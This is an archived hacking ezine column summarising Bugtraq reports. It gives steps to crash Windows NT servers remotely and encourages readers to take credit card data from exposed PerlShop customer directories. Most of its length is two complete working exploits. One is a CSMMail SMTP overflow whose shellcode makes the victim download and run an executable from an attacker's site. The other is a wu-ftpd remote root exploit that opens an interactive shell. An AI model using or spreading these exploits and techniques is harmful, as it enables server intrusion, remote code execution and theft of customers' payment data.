💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › F4ITH › suid1.t… captured on 2022-01-08 at 15:42:38.
View Raw
More Information
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]---
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Welcome to the new regular hacking section in faith, this section is devoted
to the latest news, techniches and exploits in hacking. Enjoy
----------
Bugtraq watch
As a regular colum now in faith i'll be telling everyone what is going on in
the worlds greatest mailing list - bugtraq, it's where all the latest
exploits get posted to and it's the best list for security.
Recently there have been several bugs reported. Possibly the most severe one
was a report of being able to remotly reboot an NT machine. This is how to
do it:
find an NT box running SP4 (service pack 4)
Telnet to port 1723
type 256 'h' charictors and hit return
Press ^D
This hopefully should cause the machine to completely reboot and cause
microshaft a few more headaches which is always good news for our favorite
linux servers :). This bug hasn't been confirmed yet and some people haven't
been able to get it to work, but give it a go anyway
Possibly the most serious flaw uncovered recently was an exploit in some
online shopping services, some of these are run on a software package called
perlshop. With this you can get peoples credit card info which is always
nice :)
For this one all you have to do is find a site running the software (it may
tell you that it is on the web page) and go to the directory:
www.vulnerable.com/store/customers/
or it may be in:
www.vulnerable.com/store/temp_customers/
This bug is likely to be fixed extreemly quickly so if ya wanna exploit it,
ya better hurry up :)
There has also been reported buffer overflows in the windows CSMMail SMTP
server. Time for some exploit code:
<--------------------------CUT HERE------------------------->
#define UNIX
#ifndef UNIX
#include <stdio.h>
#include <fcntl.h>
#include <winsock.h>
#include <io.h>
#define CLOSE _close
#define SLEEP Sleep
#else
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define CLOSE close
#define SLEEP sleep
#endif
/*
CSMMail Exploit by _mcp_ <pw@nacs.net>
Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>
Greets go out to the following people: Morpheus, Sizban, Rocket,
Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
and #win32asm.
You can contact me by e-mail or on efnet.
As always no greets go out to etl
const unsigned long FIXUP1 = 264;
const unsigned long FIXUP2 = 268;
const unsigned long OFFSET = 260;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
"\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
"\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
printf("Usages: \n");
printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
printf("win98 SP1:\n");
printf(" <fixup address> = 0xBFF78030\n");
printf(" <return address> = 0xBFF79243\n");
printf("NT SP3:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E53FC7\n");
printf("NT SP4:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E9A3A4\n");
printf("Will make <target host> running CSMMail download, save, and\n");
printf("execute http://<www site>/~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 5) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0)
{
printf("Input Error, the fixup memory address has incorrect format\n");
exit(0);
}
if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=FIXUP1;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr2=ptr;
ptr2+=FIXUP2;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr+=OFFSET;
memcpy ((void *) ptr,(void *)&ret_addr, 4);
ptr+=60;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) - 1 );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, "HELO lamer.com\r\n",16, 0);
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, "HELO lamer.com\r\n",16);
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
<--------------------------CUT HERE------------------------->
Also there has been another buffer overflow found in wu-ftpd, a popular ftp
deamon for unix servers. This only exists in beta versions 12 - 18, and
these aren't the current version, so don't be supprised if you find that not
too many servers are running it.
<--------------------------CUT HERE------------------------->
/*
* Remote/local exploit for wu-ftpd [12] through [18]
* gcc w00f.c -o w00f -Wall -O2
*
* Offsets/padding may need to be changed, depending on remote daemon
* compilation options. Try offsets -5000 to 5000 in increments of 100.
*
* Note: you need to use -t >0 for -any- version lower than 18.
* Coded by smiler and cossack
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";
unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
struct type {
unsigned long ret_address;
unsigned char align; /* Use this only to offset \xff's used */
signed short pad_shift; /* how little/much padding */
unsigned char overflow_type; /* whether you have to DELE */
char *name;
};
/* ret_pos is the same for all types of overflows, you only have to change
the padding. This makes it neater, and gives the shellcode plenty of
room for nops etc
*/
#define RET_POS 190
#define FTPROOT "/home/ftp"
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
{ 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
{ 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
{ 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
{ 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", },
{ 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", },
{ 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", },
{ 0,0,0,0,NULL }
};
struct options {
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;
/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
char *argv0,ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen,ctr,d;
FILE *cin;
int fd;
struct in_addr victim;
argv0 = strdup(argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
switch (d) {
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
break;
case 's':
strcpy(opts.start_dir,optarg);
break;
case 'o':
opts.offset = atoi(optarg);
break;
case 't':
opts.t = atoi(optarg);
if ((opts.t < 0)||(opts.t>5)) {
printf("Dont have that type!\n");
exit(-1);
}
}
}
argc -= optind;
argv += optind;
if (argc < 3)
usage(argv0);
if (!resolv(argv[0],&victim)) {
perror("resolving");
exit(-1);
}
strcpy(opts.username,argv[1]);
strcpy(opts.password,argv[2]);
if ((fd = tcp_connect(victim,21)) < 0) {
perror("connect");
exit(-1);
}
if (!(cin = fdopen(fd,"r"))) {
printf("Couldn't get stream\n");
exit(-1);
}
Fgets(inbuf,sizeof(inbuf),cin);
printf("%s",inbuf);
if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
fatal("Bad username\n");
if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
fatal("Bad password\n");
if (*opts.start_dir)
if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
fatal("Couldn't change dir\n");
if (ftp_command(inbuf,257,cin,"PWD\n")<0)
fatal("PWD\n");
if (parse_pwd(inbuf,&pwdlen) < 0)
fatal("PWD\n");
srand(time(NULL));
printf("Making padding directorys\n");
for (ctr = 0;ctr < 4;ctr++) {
ltr = rand()%26 + 65;
memset(outbuf,ltr,194);
outbuf[194]=0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
}
/* Make padding directory */
ctr = 124 - (pwdlen - types[opts.t].align);//180
//ctr = 152 - (pwdlen - types[opts.t].align);
ctr -= types[opts.t].pad_shift;
if (ctr < 0) {
exit(-1);
}
memset(outbuf,'A',ctr+1);
outbuf[ctr] = 0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
memset(outbuf,0x90,195);
d=0;
for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up(types[opts.t].ret_address-opts.offset,ret_string);
strcpy(outbuf+RET_POS,ret_string);
strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
printf("Press any key to send shellcode...\n");
getchar();
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
fatal("DELE\n");
/* HEH. For type 1 style we add a dele command. This overflow
occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
not checking bounds correctly, overwriting path[] in delete(). */
RunShell(fd);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
return;
}
int double_up(unsigned long blah, char *doh)
{
int a;
unsigned char *ptr,*ptr2;
bzero(doh,6);
ptr=doh;
ptr2=(char *)&blah;
for (a=0;a<4;a++) {
*ptr++=*ptr2;
if (*ptr2==0xff) *ptr++=0xff;
ptr2++;
}
return(1);
}
int parse_pwd(char *in, int *pwdlen)
{
char *ptr1,*ptr2;
/* 257 "/" is current directory */
ptr1 = strchr(in,'\"');
if (!ptr1) return(-1);
ptr2 = strchr(ptr1+1,'\"');
if (!ptr2) return(-1);
*ptr2 = 0;
*pwdlen = strlen(ptr1+1);
/* If its just "/" then it contributes nothing to the RET_POS */
if (*pwdlen==1) *pwdlen -= 1;
printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
return(1);
}
int tcp_connect(struct in_addr host,unsigned short port)
{
struct sockaddr_in serv;
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
serv.sin_port = htons(port);
serv.sin_family = AF_INET;
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
return(-1);
}
return(fd);
}
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
va_list va;
char line[1200];
int val;
va_start(va,fmt);
vsprintf(line,fmt,va);
va_end(va);
if (write(fileno(out),line,strlen(line)) < 0)
return(-1);
bzero(buf,200);
while(1) {
Fgets(line,sizeof(line),out);
#ifdef DEBUG
printf("%s",line);
#endif
if (*(line+3)!='-') break;
}
strncpy(buf,line,200);
val = atoi(line);
if (success != val) return(-1);
return(1);
}
void fatal(char *string)
{
printf("%s",string);
exit(-1);
}
char *Fgets(char *s,int size,FILE *stream)
{
char *ptr;
ptr = fgets(s,size,stream);
//if (!ptr)
//fatal("Disconnected\n");
return(ptr);
}
int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hostname,addr))
return(1);
res = gethostbyname(hostname);
if (res == NULL)
return(0);
memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
int usage(char *program)
{
fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
fprintf(stderr,"\t[-o offset] [-t type]\n");
fprintf(stderr,"types:\n");
fprintf(stderr,"0 - %s\n", types[0].name);
fprintf(stderr,"1 - %s\n", types[1].name);
fprintf(stderr,"2 - %s\n", types[2].name);
fprintf(stderr,"3 - %s\n", types[3].name);
fprintf(stderr,"4 - %s\n", types[4].name);
fprintf(stderr,"5 - %s\n", types[5].name);
fprintf(stderr,"\n");
exit(0);
}
<--------------------------CUT HERE------------------------->
Thats about all for the moment. If you want to subscribe to bugtraq
yourself, send a mail to bugtraq@netspace.org with the text subscribe bugtraq
<your e-mail> in the body of the message
Bodie
----------